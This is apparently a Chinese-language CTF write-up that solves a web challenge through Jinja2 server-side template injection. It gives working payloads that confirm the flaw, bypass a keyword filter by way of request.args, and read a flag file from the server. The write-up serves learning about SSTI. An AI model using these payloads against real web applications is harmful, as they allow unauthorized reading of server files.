- 映入眼帘的是神马奇葩玩意?
思考了一下,蟒蛇(Python)?大象(ElePHPant)?两个扭扯想说明啥?。。不懂 - 打开控制台,看看有没有提示
戳一戳链接,发现longin页面和register页面都有如下信息
emmm,按时flag的位置? - blue-whale是什么破玩意?
点完后更加懵逼了,大胆猜测,需要审计源码,那么尝试.git漏洞,看能不能搞到源码,如图
得,没戏,看看robots.txt同样的显示,说明不能看到源码。 - 如何访问到提示的flag内容
大胆猜测,需要尝试SSTI(服务器模板注入)漏洞,从而拿到flag。
参考思路:
尝试构造payload,{{7*7}}
http://111.200.241.244:62326/register.php/{{7*7}}}
如图:
说明SSTI漏洞,继续测试{{7*‘7’}}
http://111.200.241.244:62326/register.php/{{7*'7'}}}
如图:
锁定,是Jinja2或Twig模板
- 采用之前使用的payload,{{’’.class.mro[2].subclasses()}}
http://111.200.241.244:62326/register.php/{{''.__class__.__mro__[2].__subclasses__()}}
d窗提示:
也就是说,这些关键词被过滤了。。。class、 subclasses、 read尝试后都不行。尝试采用url_for
http://111.200.241.244:62326/register.php/{{url_for.__globals__}}
如图:
有鉴权,也就是被过滤了。给我直接整不会了。。。想不出来,去参考大神们的wp了。
- 采用request.args.key方式传参
这个方法开眼界,第一次知道。构造payload:
http://111.200.241.244:62326/{{''[request.args.a]}}?a=__class__
如图:
妈耶,真的可以绕过,有回显了。。。这就可以玩了,构造目标payload
http://111.200.241.244:62326/register.php/{{''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?a=__class__&b=__mro__&c=__subclasses__&d=read
如图:
构造的参考理由:关于python魔术方法payload
- 考察模板注入
- payload的其他构造方法
附带大神总结的内容:
- 文末SSTI几个学习场景
- SSTI(模板注入)基础总结
如有问题,恳请批评指正。
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)